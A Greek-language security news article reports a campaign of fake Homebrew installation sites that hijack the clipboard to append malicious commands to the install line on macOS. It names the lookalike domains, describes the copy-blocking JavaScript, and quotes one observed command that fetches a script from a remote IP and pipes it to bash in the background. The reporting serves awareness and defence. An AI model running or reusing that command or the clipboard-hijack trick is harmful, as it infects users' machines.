Μια εξελιγμένη εκστρατεία στοχεύει χρήστες macOS μέσω πλαστών ιστοσελίδων εγκατάστασης Homebrew, οι οποίες παραδίδουν κακόβουλα payloads παράλληλα με τα νόμιμα package manager installations.

Η επίθεση εκμεταλλεύεται την ευρεία εμπιστοσύνη που οι χρήστες έχουν στον δημοφιλή διαχειριστή πακέτων Homebrew, δημιουργώντας ακριβή αντίγραφα της επίσημης σελίδας εγκατάστασης brew.sh.
Οι ερευνητές ασφαλείας έχουν εντοπίσει πολλαπλά ψεύτικα domains που μιμούνται την νόμιμη ιστοσελίδα του Homebrew, όπως τα homebrewfaq.org, homebrewclubs.org και homebrewupdate.org. Αυτές οι κακόβουλες ιστοσελίδες παρουσιάζουν πειστικά αντίγραφα της επίσημης διεπαφής εγκατάστασης, αλλά ενσωματώνουν κρυφό JavaScript, σχεδιασμένο να εισάγει επιπλέον εντολές στο πρόχειρο των χρηστών χωρίς τη γνώση τους.
Δείτε επίσης: Hackers εκμεταλλεύονται το WhatsApp για διανομή banking trojan
Σε αντίθεση με τις αυθεντικές σελίδες του Homebrew, που επιτρέπουν την χειροκίνητη επιλογή κειμένου, αυτές οι πλαστές εκδόσεις αναγκάζουν τους χρήστες να χρησιμοποιούν ένα καθορισμένο κουμπί Αντιγραφής, επιτρέποντας στους επιτιθέμενους να εισάγουν κακόβουλα payloads παράλληλα με τις κανονικές εντολές εγκατάστασης.
Η εκστρατεία αντιπροσωπεύει μια σημαντική εξέλιξη στις επιθέσεις στην αλυσίδα εφοδιασμού, στοχεύοντας όχι τα ίδια τα αποθετήρια πακέτων, αλλά τη διαδικασία αρχικής εγκατάστασης.
Ενώ το Homebrew έχει διατηρήσει ένα ισχυρό ιστορικό ασφαλείας χωρίς πρόσφατες παραβιάσεις, οι απειλητικοί παράγοντες βρήκαν τον τρόπο να το εκμεταλλευτούν για να μολύνουν συστήματα των θυμάτων.

Οι αναλυτές της Sequence εντόπισαν αυτό το αναδυόμενο μοτίβο απειλής μέσω συστηματικής παρακολούθησης ύποπτων domains και υποδομών που συνδέονται με γνωστά δίκτυα διανομής κακόβουλου λογισμικού.
Η μεθοδολογία της επίθεσης δείχνει αξιοσημείωτη πολυπλοκότητα στην εκτέλεση και τις δυνατότητες αποφυγής της ανάλυσης.
Αντί να παραβιάζουν νόμιμα αποθετήρια πακέτων, οι επιτιθέμενοι έχουν αναπτύξει μια παράλληλη υποδομή που επηρεάζει τους χρήστες κατά τη διάρκεια της κρίσιμης φάσης εγκατάστασης.
Δείτε επίσης: Contagious Interview: Επίθεση με 338 κακόβουλα npm πακέτα
Αυτή η προσέγγιση παρακάμπτει τα παραδοσιακά μέτρα ασφαλείας που επικεντρώνονται στην παρακολούθηση αποθετηρίων, ενώ εκμεταλλεύεται την εγγενή εμπιστοσύνη που οι χρήστες έχουν σε γνωστές διαδικασίες εγκατάστασης.
Κατάχρηση Homebrew brand: Εξελιγμένες τεχνικές
Ο βασικός μηχανισμός μόλυνσης βασίζεται σε χειραγώγηση του πρόχειρου μέσω JavaScript. Όταν οι χρήστες κάνουν κλικ στο κουμπί Αντιγραφής στις πλαστές ιστοσελίδες, ο ενσωματωμένος κώδικας εκτελεί μια σειρά λειτουργιών, σχεδιασμένων να εισάγουν κακόβουλες εντολές παράλληλα με το αναμενόμενο script εγκατάστασης του Homebrew.
Η υλοποίηση του JavaScript περιλαμβάνει σχόλια στη ρωσική γλώσσα, που υποδεικνύουν ρητά πού πρέπει να εισαχθούν οι κακόβουλες εντολές, υποδηλώνοντας μια απειλή τύπου commodity.
🔒 Προστατέψτε την ιδιωτικότητά σας με Proton VPN
Ελβετικό VPN από τους δημιουργούς του Proton Mail — αυστηρή πολιτική no-logs, ισχυρή κρυπτογράφηση και ενσωματωμένο NetShield που μπλοκάρει διαφημίσεις, trackers & malware.
- ✔ No-logs, με έδρα την Ελβετία (εκτός 14-Eyes)
- ✔ NetShield: φραγή διαφημίσεων, trackers & κακόβουλων domains
- ✔ Καλύπτει όλες τις συσκευές — δωρεάν έκδοση διαθέσιμη
Ο σύνδεσμος είναι συνεργατικός (affiliate) — το SecNews ενδέχεται να λάβει προμήθεια χωρίς επιπλέον κόστος για εσάς. Δεν επηρεάζει την ανεξαρτησία της αρθρογραφίας μας.
Το κακόβουλο script αποτρέπει την κανονική επιλογή κειμένου μέσω event listeners που απενεργοποιούν τις λειτουργίες contextmenu, selectstart, copy, cut και dragstart στο μπλοκ εγκατάστασης.
Δείτε επίσης: Οι χάκερ χρησιμοποιούν τα Discord Webhooks για εντολές

Αυτό αναγκάζει τα θύματα να χρησιμοποιούν το παρεχόμενο κουμπί Αντιγραφής, το οποίο ενεργοποιεί τη λειτουργία copyInstallCommand(). Η λειτουργία γράφει μια προκαθορισμένη εντολή στο πρόχειρο χρησιμοποιώντας είτε το σύγχρονο API του Πρόχειρου είτε εναλλακτικές μεθόδους textarea για συμβατότητα με διαφορετικά περιβάλλοντα προγραμμάτων περιήγησης.
Η ανάλυση αποκάλυψε ότι οι ενεργές εκστρατείες χρησιμοποιούν εντολές όπως `curl -s https://185.93.89.62/d/vipx69930 | nohup bash &`, οι οποίες κατεβάζουν και εκτελούν επιπλέον payloads στο παρασκήνιο ενώ η νόμιμη εγκατάσταση του Homebrew προχωρά κανονικά, δημιουργώντας ένα αποτελεσματικό σενάριο διπλής εκτέλεσης που διατηρεί την επιχειρησιακή μυστικότητα ενώ καθιερώνει μόνιμη πρόσβαση στα παραβιασμένα συστήματα.
